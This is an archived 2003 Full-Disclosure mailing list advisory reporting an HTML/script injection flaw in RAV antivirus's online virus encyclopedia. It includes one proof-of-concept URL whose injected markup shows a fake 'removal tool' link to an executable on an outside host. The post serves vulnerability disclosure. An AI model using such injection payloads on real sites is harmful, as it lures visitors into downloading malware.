[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Code executing in RAV's virus encyclopedia

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Code executing in RAV's virus encyclopedia
From: Redaktion-Kryptocrew <momolly@xxxxxxxxxxxxx>
Date: Thu, 4 Sep 2003 09:14:53 +0200

Vulnerability:     Code executing in  RAV's virus encyclopedia
Found:             30 Aug 2003
Vendor:            RAVantivirus
Vendor notified:   03 Sept 2003
Vendor response:   no
Public release:    04 Sept 2003



A further crazy leak:
RAV's virus encyclopedia gives attackers possibilities to inject even
harmful scripts, too.
RAVantivirus overlooked this fault in their virus Information websites.



[Example]:
http://www.ravantivirus.com/virus/by-keyword.php?k=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test



Thanks to:
Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander 
Mueller (ec-security.com)


Regards
G.P

--
======================================================================

G.P.
Online-Redaktion
                  
===============================

Kryptocrew                                 http://www.kryptocrew.de
.: your security advisor team :.           mailto:momolly@xxxxxxxxxxxxx

======================================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: Re: [Full-Disclosure] SCADA - old
Next by Date: [Full-Disclosure] Authorities eye 2nd MSBlaster suspect
Previous by thread: Re: [Full-Disclosure] SCADA - old
Next by thread: [Full-Disclosure] Authorities eye 2nd MSBlaster suspect
Index(es):
- Date
- Thread